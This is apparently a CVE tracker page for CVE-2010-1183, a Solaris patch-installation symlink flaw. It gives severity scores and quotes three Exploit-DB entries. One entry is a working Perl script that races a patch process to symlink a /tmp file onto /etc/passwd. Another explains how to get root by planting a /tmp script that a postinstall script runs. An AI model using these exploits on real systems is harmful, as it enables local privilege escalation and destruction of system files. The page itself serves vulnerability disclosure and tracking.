CVE-2010-1183
published 2010-03-29CVE-2010-1183: Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary…
PriorityP415low3.3CVSS 2.0
AVLACMAuNCPIPAN
EXPLOIT
EPSS
0.49%
38.6th percentile
Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary file, related to use of Update Manager.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation
exploitdb·2013-07-09
CVE-2010-1183 Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation
Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation
---
Solaris Recommended Patch Cluster 6/19 local root on x86
Larry W. Cashdollar
7/3/2013
@_larry0
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.
Local root:
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.
./144751-01/SUNWos86r/install/postinstall
782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi
Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?
804
Exploit-DB
Solaris 10 Patch 137097-01 - Symlink Privilege Escalation
exploitdb·2012-08-11
CVE-2010-1183 Solaris 10 Patch 137097-01 - Symlink Privilege Escalation
Solaris 10 Patch 137097-01 - Symlink Privilege Escalation
---
source: https://www.securityfocus.com/bid/54919/info
Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain elevated privileges on affected computers.
#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while() {
@args = split " ", $_;
if (/inetd-upgrade/) {
print "Symlinking iconf_entries.$args[1] to $clobber\n";
symlink($clobber,"/tmp/iconf_entries.$args[1]");
exit(1);
}
}
}
Exploit-DB
Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities
exploitdb·2010-03-24
CVE-2010-1183 Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities
Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities
---
source: https://www.securityfocus.com/bid/38928/info
Sun Connection Update Manager for Solaris creates temporary files in an insecure manner.
An attacker with local access could potentially exploit these issues to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.
Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial-of-service or privilege escalation. Other attacks may also be possible.
These issues affect unknown versions of the application. In addition, these issues may affect certain Solaris patch clusters or individual patch releases.
#!/bin/sh
#
No writeups or analysis indexed.
http://www.securityfocus.com/archive/1/510305/100/0/threadedhttp://www.securityfocus.com/archive/1/510311/100/0/threadedhttp://www.securityfocus.com/bid/38928https://exchange.xforce.ibmcloud.com/vulnerabilities/57149http://www.securityfocus.com/archive/1/510305/100/0/threadedhttp://www.securityfocus.com/archive/1/510311/100/0/threadedhttp://www.securityfocus.com/bid/38928https://exchange.xforce.ibmcloud.com/vulnerabilities/57149
2010-03-29
Published